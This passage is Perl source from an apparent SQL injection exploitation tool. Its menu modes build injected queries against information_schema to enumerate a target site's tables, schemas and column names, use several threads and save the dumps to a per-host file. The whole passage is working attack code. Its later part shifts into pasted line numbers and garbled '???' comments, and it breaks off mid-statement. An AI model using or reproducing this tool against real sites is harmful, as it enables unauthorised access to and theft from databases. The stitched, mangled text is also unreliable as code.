         $temp = "(select" . $nc_plus . $sql_pref1 . "table_name" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.tables" . $nc_plus . "limit" . $nc_plus . $num . ",1)";
         $nc_start1 = $nc_start . $temp;
         $nc_midle1 = $nc_midle . $temp;
         $current = $nc_start1 . $nc_midle1 . $nc_end;
         $content = scan_url();
         if ($content =~ m/ussr(.*?)ussr/img) {
                  print $1 . "\n";
                  print FILE $1 . "\n"; # several threads write one handle; lines may interleave
         }
         print $num . "\r"; # progress indicator
         sleep $pause; # $pause is set outside this chunk

       }
     }
    print "----------\n";
    print "Saved in " . "z_" . $host . ".txt\n";
    close(FILE); # return value not checked
    goto START200; # label defined outside this chunk
}#end 2
# Mode 6: for a table name entered on STDIN, look up its schema, count its
# columns, then list the column names. Same threading scheme as modes 2-5.
# Unlike modes 3/4, neither the count nor the listing is restricted by
# table_schema, so a table name present in several schemas is matched
# across all of them, while $prefix holds only the first schema returned.
# $full_table_name set here is offered again by mode 7 ("Use last parsed table").
# Globals read but set outside this chunk: $host, $nc_start, $nc_midle,
# $nc_end, $nc_plus, $sql_pref1, $sql_pref2, $proxy_message, $pause,
# $method, $kol_threads, label START200. ascii_to_hex is not defined in
# this block; it is the identical sub compiled in modes 3, 4, 5 and 7.
if ($choice==6) {
    # Output file: 2-arg open on a bareword handle, append mode, return value not checked.
    open( FILE, ">>" . "z_" .$host . ".txt" );
    print "-----------------------------------------\n";
    print "Enter the table_name: ";
    $choice = <STDIN>; # $choice is reused: menu number before, table name from here on
    chomp $choice;
    if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"} # backtick-quote names containing '-'
    print "Table: $choice\n";
    print "----------\n";
    print FILE  "-----------------------------------------\n";
    print FILE  "Table [ $choice ]\n";
    print FILE  "-----------------------------------------\n";
    $choice1 = ascii_to_hex $choice; # hex literal used in the table_name comparisons
    ## Schema that owns the table (first match only) ##
    $temp = "(select" . $nc_plus . $sql_pref1 . "table_schema" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.tables" . $nc_plus . "where" . $nc_plus . "table_name=" . $choice1 . $nc_plus . "limit" . $nc_plus . "0,1)";
    $nc_start1 = $nc_start . $temp;
    $nc_midle1 = $nc_midle . $temp;
    $current = $nc_start1 . $nc_midle1 . $nc_end; # scan_url() (defined elsewhere) works on $current
    $content = scan_url();
    $prefix = $content;
    # Value expected between literal "ussr" markers; if absent, $1 is stale.
    $prefix =~ m/ussr(.*?)ussr/img;
    $prefix = $1; # schema name
    if ($prefix =~ m/-/imgs) {$prefix = "`" . $prefix . "`"}
    print "Database for $choice: $prefix\n";
    print FILE  "Database for $choice: $prefix\n";
    ## Column count; note this one is not wrapped in parentheses like the other $temp strings ##
    $temp = "select" . $nc_plus . $sql_pref1 . "count(*)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.columns" . $nc_plus . "where" . $nc_plus . "table_name=" . $choice1;
    $nc_start1 = $nc_start . $temp;
    $nc_midle1 = $nc_midle . $temp;
    $current = $nc_start1 . $nc_midle1 . $nc_end;
    $content = scan_url();
    $colum_number = $content;
    $colum_number =~ m/ussr(.*?)ussr/img;
    $colum_number = $1; # raw column count; loop below runs $num from 0 to this value
    $full_table_name = $prefix . "." . $choice;
    print "Number of columns in " . $full_table_name . ": $colum_number\n";
    print FILE  "Number of columns in " . $full_table_name . ": $colum_number\n";
    print "----------\n";
    ## Column listing ##
    $thr = $kol_threads; # 0..$thr below is inclusive, so $kol_threads+1 workers are started
    $num = -1; # shared row counter; each worker increments it before use
    print "Request method - $method\n";
    print "Threads - $kol_threads\n";
    print "Proxy - $proxy_message\n";
    print "----------------------\n";
    print FILE  "Columns in " . $full_table_name . "\n";
    for(0..$thr) {
         $trl[$_] = threads->create(\&gets113);
    }
    for(0..$thr) {
         $trl[$_]->join;
    }
    # Worker: claim the next offset, fetch one column_name, print it indented.
    # Named subs are compiled before runtime, so this placement is fine.
    sub gets113 {
       $| = 1; # autoflush so the "\r" progress line is visible
       while ($num<$colum_number) {
         { lock($num);
         $num++; }
         # $num is read below outside the lock: interleaving workers can
         # request the same offset.
         $temp = "(select" . $nc_plus . $sql_pref1 . "column_name" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.columns" . $nc_plus . "where" . $nc_plus . "table_name=" . $choice1 . $nc_plus . "limit" . $nc_plus . $num . ",1)" ;
         $nc_start1 = $nc_start . $temp;
         $nc_midle1 = $nc_midle . $temp;
         $current = $nc_start1 . $nc_midle1 . $nc_end;
         $content = scan_url();
         if ($content =~ m/ussr(.*?)ussr/img) {
                  print "   " . $1 . "\n";
                  print FILE "  "  . $1 . "\n"; # several threads write one handle; lines may interleave
         }
         print $num . "\r"; # progress indicator
         sleep $pause; # $pause is set outside this chunk

       }
    }
    print FILE "----------\n";
    print "----------\n";
    print "Saved in " . "z_" . $host . ".txt\n";
    close(FILE); # return value not checked
    goto START200; # label defined outside this chunk
}# end 3
  4087. if ($choice==7) {
  4088.     sub ascii_to_hex ($) {
  4089.                (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
  4090.                $str = "0x" . $str;
  4091.              return $str;
  4092.     }
  4093.     open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  4094.     if ($full_table_name) {
  4095.        print "-----------------------------------------\n";
  4096.        print "Use last parsed table: $full_table_name ? (1/0): ";
  4097.        $choice = <STDIN>;
  4098.        chomp $choice;
  4099.        if ($choice==1) {
  4100.              $table_name = $full_table_name;
  4101.              print "Table: $table_name\n";
  4102.              print "----------\n";
  4103.        } else {
  4104.              print "-----------------------------------------\n";
  4105.              print "Enter the table_name: ";
  4106.              $choice = <STDIN>;
  4107.              chomp $choice;
  4108.              if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
  4109.              $table_name = $choice;
  4110.              print "-----------------------------------------\n";
  4111.              print "MySQL>=5 or MySql<5? (1/0): ";
  4112.              $choice = <STDIN>;
  4113.              chomp $choice;
  4114.              if ($choice == 1) {
  4115.                   $choice1 = ascii_to_hex $table_name;
  4116.                   $temp = "(select" . $nc_plus . $sql_pref1 . "table_schema" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.tables" . $nc_plus . "where" . $nc_plus . "table_name=" . $choice1 . $nc_plus . "limit" . $nc_plus . "0,1)";
  4117.                   $nc_start1 = $nc_start . $temp;
  4118.                   $nc_midle1 = $nc_midle . $temp;
  4119.                   $current = $nc_start1 . $nc_midle1 . $nc_end;
  4120.                   $content = scan_url();
  4121.                   $prefix = $content;
  4122.                   $prefix =~ m/ussr(.*?)ussr/img;
  4123.                   $prefix = $1; # ??, ? ??????? ???????
  4124.                   if ($prefix =~ m/-/imgs) {$prefix = "`" . $prefix . "`"}
  4125.                   $table_name = $prefix . "." . $table_name;
  4126.              }
  4127.              print "Table: $table_name\n";
  4128.              print "----------\n";
  4129.        }
  4130.     } else {
  4131.        print